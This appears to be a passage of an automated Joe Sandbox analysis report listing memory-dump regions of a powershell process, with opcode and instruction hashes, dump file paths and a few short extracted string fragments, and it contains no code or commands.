                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4383da5c4f6bf68743b2b02b20355c780c2133f8d949e58158eedc2e2f8c924d
                                                        • Instruction ID: a74c0f32adbbe87eddfe08a2b5474d19e134b3be3989e2a6446b2f22cfcd2e11
                                                        • Opcode Fuzzy Hash: 4383da5c4f6bf68743b2b02b20355c780c2133f8d949e58158eedc2e2f8c924d
                                                        • Instruction Fuzzy Hash: 27120674A11219EFDB14CFA8D484B9DBBF2BF88314F24C559E809AB351CB71AD85CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489845722.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0809dadcc9336cf2bcda2693b251db354c91f7458b7c905c030f27c8c72da60a
                                                        • Instruction ID: c1d835753a8dc9208aa6e6f83122599fcbd3e625528159968af0f99395c3fec9
                                                        • Opcode Fuzzy Hash: 0809dadcc9336cf2bcda2693b251db354c91f7458b7c905c030f27c8c72da60a
                                                        • Instruction Fuzzy Hash: FD51C974A102099FDB14CFA8D494BADFBF6AF88314F24C559E408AB351C775ED86CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4193e852a703f25a3af1540665bdb56f6f2de3659473269394f0a30189a938a3
                                                        • Instruction ID: 2e7ede9604b3afa64e86a7d59cd2d2a5549155bda599f06806db8dfb60c462d9
                                                        • Opcode Fuzzy Hash: 4193e852a703f25a3af1540665bdb56f6f2de3659473269394f0a30189a938a3
                                                        • Instruction Fuzzy Hash: 46219035A00285CFCF28DF56C544A6ABFF2BB98310F2981A9D9489F246D771DC84CF91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80a32d67686c3b41a3a2c5227e0211c996bc7caaca9392e1343450cd90bf04bd
                                                        • Instruction ID: 7b45ab99799f6bfa9106e2e4ab935f163bed9d6875421b4586eff9ebe7bafc34
                                                        • Opcode Fuzzy Hash: 80a32d67686c3b41a3a2c5227e0211c996bc7caaca9392e1343450cd90bf04bd
                                                        • Instruction Fuzzy Hash: E8216D31A00285CFCF28DF5AC544A6ABBF2BB98310F1581A9DA489B245D771DC84CF91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9991ef23882aa69666d8232f2b8610f228459089c8b942a91a649bac725ef2b1
                                                        • Instruction ID: 4564bb6bd79a0f592ce3dd7a367097b8a85795517e339980a4645301c0b676ca
                                                        • Opcode Fuzzy Hash: 9991ef23882aa69666d8232f2b8610f228459089c8b942a91a649bac725ef2b1
                                                        • Instruction Fuzzy Hash: 7F21B030A04A45CFDB28DF26C05076A7BA2BF54328F24816AE488DB211F731DC41CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489845722.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2044c08e4bfa1ec85d48ed69bbc44143c2f0cf2b373606221b003fb4c61b03e3
                                                        • Instruction ID: f15883eff4ca2a47eceb9fe7bb933886a6666c5a8c9b2df254415fc96797dfc1
                                                        • Opcode Fuzzy Hash: 2044c08e4bfa1ec85d48ed69bbc44143c2f0cf2b373606221b003fb4c61b03e3
                                                        • Instruction Fuzzy Hash: 9F11D774A14209EFDB04CBA8D484F9DBBF1AF88314F25C559E805AB361C775ED86CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489811544.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_20d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 328484cd9b2c162f5abf6ca5776f5231a295133b5192a669333f7652d747acac
                                                        • Instruction ID: 6c68dac3ef190e4a93eba6a866ffa010dd925076c0b6779a00aa572e8aa17b8b
                                                        • Opcode Fuzzy Hash: 328484cd9b2c162f5abf6ca5776f5231a295133b5192a669333f7652d747acac
                                                        • Instruction Fuzzy Hash: 4601F2B0516340EBF7104E66C8C4B66BF99DF41360F18C12AEC8C0F2C3C2B99845CAB2
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489811544.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_20d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42b14821c5b2188c70d31b57b12b2c8ccf75a0d8cb03d95328037868d38f67d
                                                        • Instruction ID: edde56e5ef7d281077dcf3a7159e0e82bde09ae02ed975503ea50451f0a333ba
                                                        • Opcode Fuzzy Hash: b42b14821c5b2188c70d31b57b12b2c8ccf75a0d8cb03d95328037868d38f67d
                                                        • Instruction Fuzzy Hash: CAF06271505344AEE7108E16CCC4B62FF99EB51724F18C55AED884F682C2799C45CAB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (:E$(:E$(:E$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:E$L:E$L:E
                                                        • API String ID: 0-2296901586
                                                        • Opcode ID: 0b1ce463950c0b96bc87b174ff52e78bc0dac172c1ee814ecd25a9cdc369ccc5
                                                        • Instruction ID: 05868226fc157854bc36787532b8264ace8b58b5a46d9574487867e83cf95ef1
                                                        • Opcode Fuzzy Hash: 0b1ce463950c0b96bc87b174ff52e78bc0dac172c1ee814ecd25a9cdc369ccc5
                                                        • Instruction Fuzzy Hash: 45E12431700384DFDF198E65D8107BE7BA2BF85311F188466E9819B2D1DBB5CD81CBA2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $;E$$;E$$;E$L4#p$L4#p$L4#p
                                                        • API String ID: 0-2750468570
                                                        • Opcode ID: 56e7209cafa7d92d3c7c1142ab9bccf24efd4aa2382db285c8297f0ec409d282
                                                        • Instruction ID: ee1f351a25e5b86edcbabcf29efd7e77fef03ce579a5ccae4f31f1550294ef35
                                                        • Opcode Fuzzy Hash: 56e7209cafa7d92d3c7c1142ab9bccf24efd4aa2382db285c8297f0ec409d282
                                                        • Instruction Fuzzy Hash: F8613331700384AFDF199F25C8107AE7BA2FF81311F158066E9819B2D2DBB4DD90CBA2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `\f$`\f$h%f$h%f
                                                        • API String ID: 0-4039681090
                                                        • Opcode ID: d36f6e2a4819bad0e31099be340727413920105994454d6627d190eed9ea8ffe
                                                        • Instruction ID: cee93b5ecb2f1931a960b445d5e6fcbd1236a08cf81fa1723c431e6b32c3cc52
                                                        • Opcode Fuzzy Hash: d36f6e2a4819bad0e31099be340727413920105994454d6627d190eed9ea8ffe
                                                        • Instruction Fuzzy Hash: 16510635B043818FD7299A7A881476ABFF6BFD5311F2488BAD5C5CB281DA31CE45C362